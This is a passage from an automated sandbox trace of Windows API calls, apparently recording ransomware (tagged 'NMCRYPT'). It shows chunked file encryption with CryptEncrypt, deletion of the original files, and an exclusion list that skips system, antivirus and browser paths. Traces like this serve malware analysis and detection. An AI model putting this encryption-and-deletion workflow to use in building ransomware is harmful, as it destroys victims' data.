pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.528] GetLastError () returned 0x0 [0169.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.528] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.528] GetLastError () returned 0x0 [0169.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.528] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.528] GetLastError () returned 0x0 [0169.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.528] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.528] GetLastError () returned 0x0 [0169.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.529] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.529] GetLastError () returned 0x0 [0169.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.529] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.529] GetLastError () returned 0x0 [0169.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.529] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.529] GetLastError () returned 0x0 [0169.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.529] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.529] GetLastError () returned 0x0 [0169.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.530] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.530] GetLastError () returned 0x0 [0169.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.530] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.530] GetLastError () returned 0x0 [0169.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.530] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.530] GetLastError () returned 0x0 [0169.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.530] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.530] GetLastError () returned 0x0 [0169.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.530] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.530] GetLastError () returned 0x0 [0169.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.531] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.531] GetLastError () returned 0x0 [0169.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x4c, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x4c, lpOverlapped=0x0) returned 1 [0169.531] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x4c, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x50) returned 1 [0169.531] GetLastError () returned 0x0 [0169.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x50, lpOverlapped=0x0) returned 1 [0169.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0169.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x28828c0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0169.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc")) returned 0x20 [0169.531] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", dwFileAttributes=0x20) returned 0 [0169.532] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 1 [0169.532] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc")) returned 0 [0169.532] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" [0169.532] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB") returned 1 [0169.532] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xX9D7.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xx9d7.tmp")) returned 0x9d7 [0169.533] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xX9D7.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xx9d7.tmp"), dwFlags=0x1) returned 0 [0169.533] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xX9D7.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xx9d7.tmp")) returned 1 [0169.533] CryptDestroyKey (hKey=0x9ad138) returned 1 [0169.533] wcslen (_String="OK") returned 0x2 [0169.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.533] CryptDestroyKey (hKey=0x9ad478) returned 1 [0169.533] CryptDestroyHash (hHash=0x9ad278) returned 1 [0169.534] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*NMCRYPT") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*Recovers your files.html") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*.exe") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*.dll") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*.lnk") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*.bat") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*.ini") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*.msi") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*.scf") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*pagefile.sys*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*NTUSER.DAT*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*AppData*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\winrar\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\java\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\TeamViewer\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\windows\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\ESET\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\AVG\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\AVIRA\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*\\AVAST Software\\*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*Atheros*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*Realtek*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*bootmgr*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*boot*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*boot*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*CONFIG.SYS*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*IO.SYS*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*MSDOS.SYS*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*NTDETECT.COM*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*ntldr*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*chrome*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*opera*") returned 0 [0169.534] PathMatchSpecW (pszFile="oledbvbs.inc", pszSpec="*firefox*") returned 0 [0169.535] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", pszSpec="*") returned 1 [0169.535] strlen (_Str="NMoreira") returned 0x8 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: 